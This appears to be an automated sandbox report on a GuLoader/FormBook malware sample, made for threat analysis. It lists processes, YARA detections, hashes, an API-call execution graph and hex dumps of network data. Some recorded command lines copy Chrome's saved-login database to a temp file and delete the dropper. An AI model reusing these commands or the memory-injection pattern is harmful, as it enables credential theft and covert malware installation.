                                                                                                                        Data Ascii: w{k*%H8^<]nh6ZW`xdL3^nt6>OYn8p\K9TI!\wlPuXjSytZXzoJT|j"f~?VXbRiz=2dym0rI-5UpwVRTF f:KU?,!U+g;+3g>SYJ1^B
                                                                                                                        2021-11-25 12:01:33 UTC625INData Raw: cb 25 e9 09 0a 08 6c 8d 8b 5b 75 bd f1 b1 f1 0d 75 87 30 c0 6a 79 ca 9a 11 96 39 85 12 83 5b ec cb c2 11 25 bf 7d 84 49 61 87 75 48 20 d3 77 54 80 6d 37 d6 21 5f f7 3a 47 51 af d0 51 81 fa 8a 4c 26 63 57 94 fd 3d f7 d7 e7 68 b1 73 f4 97 f4 f0 c4 79 dc 51 18 5c 96 56 23 ea 00 35 e3 40 c1 24 d2 f5 1f 01 93 c3 f7 73 79 10 02 14 f7 8c dc 89 2c 3a a8 84 ad 05 81 69 03 54 95 e9 ca 86 f7 b0 f1 15 f7 7d 81 31 5b 95 bd 4d a1 3e ad a4 0a e6 54 40 fb f9 20 09 aa a8 80 88 2a fa e5 0f 89 3a 3b 4a b9 ec cd bc e4 2e 6f 43 f4 1e ae 6d 18 75 46 3c a5 4f db 34 9c 46 8e ce 9b b1 93 43 fc eb f1 43 76 76 eb 4c a0 b4 c5 7d 49 44 3b f3 22 61 46 c5 ac ed ca af ad b4 eb d0 ab 13 80 af 21 78 a0 df c5 1c 87 fc 15 80 eb 65 84 73 26 72 96 b3 fe 20 21 79 fd 60 2f 60 a9 6c ec f9 cf 4a
                                                                                                                        Data Ascii: %l[uu0jy9[%}IauH wTm7!_:GQQL&cW=hsyQ\V#5@$sy,:iT}1[M>T@ *:;J.oCmuF<O4FCCvvL}ID;"aF!xes&r !y`/`lJ
                                                                                                                        2021-11-25 12:01:33 UTC632INData Raw: 14 27 0b 9e 3f 22 e9 e1 4b d7 fd cc 2a a7 20 d8 27 4a 9c 34 f2 fa 06 6b 51 fe e8 1e ef d9 65 5a 30 88 ae 98 ec 32 c0 2b 3b f3 6b 7d 5e 83 15 29 c8 e7 62 72 4f 8c 26 85 aa fa cf 66 09 05 02 d1 12 ae 29 d8 86 31 29 1e 97 c9 89 c3 d7 06 9f 65 8f 3e c1 85 6c 36 fd 3c 3a 7e 39 a8 d8 ce 56 6a 11 ec 96 bb 06 9e 1f bc d1 08 55 d1 21 b0 f2 d2 e2 af 1c ad d9 fa 80 cc be 13 3c 63 f4 d9 29 6d 36 61 01 2a 29 84 0d 19 8f 4a 65 9a 08 8d 93 60 57 20 9a 19 ec 50 27 97 5c da 73 d2 4a 49 73 64 fa ee 91 c5 c2 e5 69 16 f4 3e 59 92 80 2c 94 20 8f 45 08 cb 2d 15 35 8f f3 4b 37 e6 65 cb bc 8e 2c d3 63 82 f4 81 74 54 03 3b 09 9d 85 4e da 1e a3 23 5a 54 72 7d 03 30 a8 bb 60 2e 83 4e dc 16 7d ef fe 6e 6d 33 b1 f0 a1 64 a6 48 3b 4f 21 2b 9e 7f 39 4d c1 5a 3e 27 bd eb e3 29 c9 27 eb
                                                                                                                        Data Ascii: '?"K* 'J4kQeZ02+;k}^)brO&f)1)e>l6<:~9VjU!<c)m6a*)Je`W P'\sJIsdi>Y, E-5K7e,ctT;N#ZTr}0`.N}nm3dH;O!+9MZ>')'
                                                                                                                        2021-11-25 12:01:33 UTC640INData Raw: 7d ee 93 7c c8 a7 54 e9 e1 5f 44 d4 7b 12 05 02 53 9a 24 be 8f ee 28 6e 94 04 0b e3 80 fc 64 b6 94 90 4d c1 cb 50 70 5b 0c e3 da 4d 13 12 79 c9 d5 39 2c ba 06 19 fa 4f 70 ca 7f cc dd 3d 43 10 1c 4a 6b 80 dd b6 b9 3c e5 4f 38 8b 8b af 80 fd 32 8e 5c 66 e9 be 8e 5c da 58 ce 0c e9 a1 5d fe de 19 6d 15 ec 43 35 f6 8f b6 5d 29 e9 ab ed 8e 13 13 01 6c c1 b6 66 7e 9e d8 ea 93 9e 56 cb 42 90 99 98 79 ca cb d1 d6 aa 89 d0 d6 81 1c 74 cd 82 e0 6b 93 48 f2 0f 9c c2 fb ee f8 ca 1b 76 60 c2 ae ab 9b 5d 07 1d cd 6d 03 39 4b 02 c2 06 5e fa e6 d2 57 5d 95 38 2c aa 8d 0f 9b a8 dd 19 c5 52 b3 1f ad b5 02 25 ab 37 36 60 25 b8 cc cd 2c 39 71 e8 86 57 cc 8d 44 ea 3e 87 9f 5b 0a 60 8b 99 66 aa b4 52 b4 91 ca 69 c7 29 63 93 e4 9e 0c c0 ee 48 c3 41 2a 4b d5 ff 09 33 8b 8f 7e 30
                                                                                                                        Data Ascii: }|T_D{S$(ndMPp[My9,Op=CJk<O82\f\X]mC5])lf~VBytkHv`]m9K^W]8,R%76`%,9qWD>[`fRi)cHA*K3~0
                                                                                                                        2021-11-25 12:01:33 UTC648INData Raw: 07 13 23 bb 38 c9 12 7e 8f ba c8 7b 28 f2 25 a6 e8 69 ac ac 9a dd 8f 1d a9 13 57 58 58 e8 63 34 d0 83 66 01 0d 00 6c 4b 59 dd 90 91 dd 19 42 76 7f e8 78 a2 04 fb 83 63 bd 05 c7 d2 0e e1 d9 00 60 8a 34 73 c8 78 3e 5b e7 3e a3 9d ed 5b 1a 06 f0 9f 51 fa 44 a4 95 ae 99 79 f2 2b 5c 9f c0 c4 5b 64 a1 76 e2 26 98 54 b0 67 60 f8 9b a2 b3 6a 1d d4 ac 87 32 f3 54 da 1b 70 52 c3 09 51 1c 05 4a 39 37 8c 1e d5 98 4a dd 10 04 06 0e ab c0 ec de 54 c1 e5 4b e3 9f a9 b5 33 0b 6d 03 3b ea 64 49 a1 8a c4 0d 1b d3 59 41 4a 0d 86 49 38 72 c8 ca cd 5f cf 0c 86 70 a9 fc f7 09 35 b1 a9 71 42 c4 37 f4 b8 4f 18 f7 22 b0 e9 62 6e b5 c8 df 7e 73 f2 93 ab 94 f2 9e 37 6b 95 f3 05 3d 96 36 a0 97 a6 db a5 95 e4 a7 7e 3a e0 e6 ed 80 3b 17 16 ed fc ab d1 bc 64 ff 41 fb eb 91 c1 8e 6f f4
                                                                                                                        Data Ascii: #8~{(%iWXXc4flKYBvxc`4sx>[>[QDy+\[dv&Tg`j2TpRQJ97JTK3m;dIYAJI8r_p5qB7O"bn~s7k=6~:;dAo


                                                                                                                        Code Manipulations

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:12:53:27
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Zr26f1rL6r.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:Visual Basic
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:12:54:11
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Zr26f1rL6r.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:12:54:56
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff68e4c0000
                                                                                                                        File size:4849904 bytes
                                                                                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:55:10
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Imagebase:0xd50000
                                                                                                                        File size:61440 bytes
                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:55:14
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
                                                                                                                        Imagebase:0x320000
                                                                                                                        File size:236544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:55:15
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6f4340000
                                                                                                                        File size:875008 bytes
                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:59:40
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:Visual Basic
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:12:59:45
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                        Imagebase:0x320000
                                                                                                                        File size:236544 bytes
                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:59:45
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff6f4340000
                                                                                                                        File size:875008 bytes
                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:59:46
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                        Imagebase:0x7ff788ee0000
                                                                                                                        File size:597432 bytes
                                                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:12:59:53
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:Visual Basic
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:13:00:00
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:Visual Basic
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        General

                                                                                                                        Start time:13:00:27
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        General

                                                                                                                        Start time:13:00:40
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        General

                                                                                                                        Start time:13:00:48
                                                                                                                        Start date:25/11/2021
                                                                                                                        Path:C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:144472 bytes
                                                                                                                        MD5 hash:812181DF251E06433BF2F4F6A0C0F0F4
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.7%
                                                                                                                          Dynamic/Decrypted Code Coverage:88.7%
                                                                                                                          Signature Coverage:72.7%
                                                                                                                          Total number of Nodes:417
                                                                                                                          Total number of Limit Nodes:9

                                                                                                                          Graph

                                                                                                                          execution_graph 8965 41e8a0 #574 __vbaStrMove __vbaStrCmp __vbaFreeStr __vbaFreeVar 8966 41eaa4 #692 __vbaVarTstNe __vbaFreeVar 8965->8966 8967 41e93f 8 API calls 8965->8967 8970 41eae1 #536 __vbaStrMove __vbaFreeVar 8966->8970 8971 41ec84 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 8966->8971 8968 41e9c0 __vbaObjSet 8967->8968 8969 41e9ab __vbaNew2 8967->8969 8976 41e9e3 8968->8976 8969->8968 8972 41eb1e 8970->8972 8973 41eb0e __vbaNew2 8970->8973 8977 41eb34 __vbaHresultCheckObj 8972->8977 8982 41eb47 8972->8982 8973->8972 8978 41e9e9 __vbaHresultCheckObj 8976->8978 8979 41e9fb #690 __vbaFreeStr __vbaFreeObj 8976->8979 8977->8982 8978->8979 8980 41ea44 __vbaObjSet 8979->8980 8981 41ea2f __vbaNew2 8979->8981 8988 41ea67 8980->8988 8981->8980 8984 41eb73 __vbaStrMove __vbaFreeObj 8982->8984 8985 41eb65 __vbaHresultCheckObj 8982->8985 8986 41eba3 8984->8986 8987 41eb93 __vbaNew2 8984->8987 8985->8984 8991 41ebc4 8986->8991 8992 41ebb9 __vbaHresultCheckObj 8986->8992 8987->8986 8989 41ea6d __vbaHresultCheckObj 8988->8989 8990 41ea7f __vbaFileOpen __vbaFreeStr __vbaFreeObj 8988->8990 8989->8990 8990->8966 8993 41ebea __vbaStrMove __vbaFreeObj 8991->8993 8994 41ebdc __vbaHresultCheckObj 8991->8994 8992->8991 8995 41ec20 __vbaObjSet 8993->8995 8996 41ec0b __vbaNew2 8993->8996 8994->8993 8998 41ec43 8995->8998 8996->8995 8999 41ec57 8998->8999 9000 41ec49 __vbaHresultCheckObj 8998->9000 9001 41ec7b __vbaFreeObj 8999->9001 9002 41ec6d __vbaHresultCheckObj 8999->9002 9000->8999 9001->8971 9002->9001 9003 41edf0 9004 41ee27 __vbaVarDup #645 __vbaStrMove __vbaFreeVar 9003->9004 9005 41ee90 __vbaObjSet 9004->9005 9006 41ee7b __vbaNew2 9004->9006 9008 41eed7 9005->9008 9006->9005 9009 41eedd __vbaHresultCheckObj 9008->9009 9010 41eeef __vbaFreeObj 9008->9010 9009->9010 9011 41ef03 __vbaNew2 9010->9011 9012 41ef18 __vbaObjSet 9010->9012 9011->9012 9014 41ef37 9012->9014 9015 41ef3d __vbaHresultCheckObj 9014->9015 9016 41ef4f __vbaFreeObj 9014->9016 9015->9016 9017 41ef74 __vbaFreeStr 9016->9017 9018 23138e2 9019 2313853 9018->9019 9020 231385e 9018->9020 9019->9020 9021 231c18f TerminateProcess 9019->9021 9022 4013b4 #100 9023 4013be 9022->9023 9024 231257b 9025 2312531 9024->9025 9025->9024 9031 231fcc1 GetPEB 9025->9031 9027 2320fcb 9028 2320ff7 33 API calls 9027->9028 9029 2320ff2 9028->9029 9033 2320ff7 9029->9033 9032 231fcdb 9031->9032 9032->9027 9034 2321002 9033->9034 9037 2321161 9034->9037 9036 23212f6 9036->9029 9048 231138e 9037->9048 9038 23212b3 9038->9036 9039 231bcba 9039->9036 9039->9038 9040 231f4e4 LoadLibraryA 9039->9040 9041 231fcc1 GetPEB 9039->9041 9042 231f533 9040->9042 9043 231f4c2 9041->9043 9042->9036 9043->9040 9044 23214fe GetPEB 9044->9048 9047 2311320 9047->9036 9048->9039 9048->9044 9048->9047 9050 23218ac 9048->9050 9054 232322b 29 API calls 9048->9054 9056 2321f4c 9048->9056 9058 2322284 9048->9058 9062 231bbfe 9048->9062 9063 231f3ee LoadLibraryA GetPEB 9048->9063 9066 2322acd 29 API calls 9048->9066 9071 231b695 9048->9071 9081 2321490 9048->9081 9125 231f3ca GetPEB 9048->9125 9126 231bd4b 9048->9126 9132 23223e2 9048->9132 9135 23206a2 9048->9135 9179 232322b 9048->9179 9055 23223e2 NtProtectVirtualMemory 9050->9055 9051 23223e2 NtProtectVirtualMemory 9052 23223db 9051->9052 9052->9036 9057 2323190 RtlAddVectoredExceptionHandler 9054->9057 9055->9047 9056->9047 9059 23223e2 NtProtectVirtualMemory 9056->9059 9057->9048 9058->9051 9060 232216a 9059->9060 9060->9036 9064 2322acd 29 API calls 9062->9064 9063->9048 9065 231bc5f 9064->9065 9067 2322acd 29 API calls 9065->9067 9066->9048 9068 231bc72 9067->9068 9069 2322acd 29 API calls 9068->9069 9069->9039 9071->9062 9072 231b943 NtWriteVirtualMemory 9071->9072 9073 231b9e1 9072->9073 9073->9062 9130 2322acd 9073->9130 9223 231f3ee 9081->9223 9083 23214fe GetPEB 9095 231138e 9083->9095 9084 23223e2 NtProtectVirtualMemory 9084->9095 9085 2311320 9085->9048 9086 23223e2 NtProtectVirtualMemory 9087 23223db 9086->9087 9087->9048 9088 2321f4c 9088->9085 9092 23223e2 NtProtectVirtualMemory 9088->9092 9089 2322284 9089->9086 9090 23223e2 NtProtectVirtualMemory 9090->9085 9091 23218ac 9091->9090 9093 232216a 9092->9093 9093->9048 9094 23206a2 25 API calls 9094->9095 9095->9081 9095->9083 9095->9084 9095->9085 9095->9088 9095->9089 9095->9091 9095->9094 9096 232322b 25 API calls 9095->9096 9097 2321490 25 API calls 9095->9097 9098 232322b 25 API calls 9095->9098 9105 231bbfe 9095->9105 9106 231f3ee LoadLibraryA GetPEB 9095->9106 9112 231bd4b 25 API calls 9095->9112 9113 231bcba 9095->9113 9114 2322acd 25 API calls 9095->9114 9115 231b695 9095->9115 9222 231f3ca GetPEB 9095->9222 9096->9095 9097->9095 9099 2323190 RtlAddVectoredExceptionHandler 9098->9099 9099->9095 9100 231f4e4 LoadLibraryA 9102 231f533 9100->9102 9101 231fcc1 GetPEB 9103 231f4c2 9101->9103 9102->9048 9103->9100 9107 2322acd 25 API calls 9105->9107 9106->9095 9108 231bc5f 9107->9108 9109 2322acd 25 API calls 9108->9109 9110 231bc72 9109->9110 9111 2322acd 25 API calls 9110->9111 9111->9113 9112->9095 9113->9048 9113->9100 9113->9101 9114->9095 9115->9105 9116 231b943 NtWriteVirtualMemory 9115->9116 9117 231b9e1 9116->9117 9117->9105 9118 2322acd 25 API calls 9117->9118 9119 231ba4c 9118->9119 9119->9105 9120 2322acd 25 API calls 9119->9120 9121 231bb07 9120->9121 9121->9105 9122 231bb84 9121->9122 9122->9085 9123 2322acd 25 API calls 9122->9123 9124 231bbfa 9123->9124 9124->9048 9125->9048 9127 231e44c 9126->9127 9229 231bd54 